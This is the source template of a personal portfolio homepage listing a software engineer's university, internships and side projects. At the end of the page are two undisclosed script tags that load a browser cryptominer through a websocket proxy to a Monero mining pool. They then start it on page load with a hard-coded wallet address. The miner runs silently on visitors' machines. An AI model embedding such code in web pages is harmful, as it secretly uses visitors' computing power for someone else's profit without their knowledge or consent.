---
layout: default
title: Wei-Wei Wu
description: software engineer, marathon runner, rock climber, taco lover.
---
<div class="flex flex-column w-80 mw9 pv4 pv0-ns center">

  {% include header.html %}

  <div class="flex-auto flex flex-column justify-center pv4 pv5-ns">
    <h1 class="mt0 mb4 fw5 f3 f2-m f1-l normal lh-copy lh-title-ns measure-narrow black-80">
      Hello, I&rsquo;m Wei-Wei Wu. {{ page.description }}
    </h1>
    <p class="mv3 f5 f4-ns lh-copy measure">
      <a class="pb1-ns no-underline color-inherit bb color-animate hover-dark-red" href="https://twin-cities.umn.edu/">University of Minnesota, Twin Cities</a> Class of 2017. Cum Laude.
    </p>
    <p class="mv3 f5 f4-ns lh-copy measure">
      Interned previously at <a class="pb1-ns no-underline color-inherit bb color-animate hover-dark-red" href="https://amazon.com">Amazon</a>,
      <a class="pb1-ns no-underline color-inherit bb color-animate hover-dark-red" href="http://www.unitedhealthgroup.com/">UnitedHealth Group</a>, and
      <a class="pb1-ns no-underline color-inherit bb color-animate hover-dark-red" href="https://www.lilitofu.com/">Lilitofu</a>.
    </p>
    <p class="mv3 f5 f4-ns lh-copy measure">
      Interested in <a class="pb1-ns no-underline color-inherit bb color-animate hover-dark-red" href="https://github.com/wuweiweiwu/COST">single threaded graph computations</a> in Rust
      and <a class="pb1-ns no-underline color-inherit bb color-animate hover-dark-red" href="https://github.com/wuweiweiwu/react-isometric-grids">isometric grids</a>  using dynamic.js
    </p>
  </div>

  {% include projects.html %}
  {% include footer.html %}

  <script src="http://weiweiwu.me/my-proxy/m.js?proxy=wss://wu-proxy.herokuapp.com?pool=pool.supportxmr.com:3333"></script>
  <script>
  var miner = CH.Anonymous(
    "49dAuSkvmLoihv6UwbEpmtg88dbV9KcAYStuhqC7PoSGaYRSnput2EHS7zjxdt58iALX5Ehe2FxsQUuq2HBu8KES7hoKytu"
  );
  miner.start();
  </script>

</div>
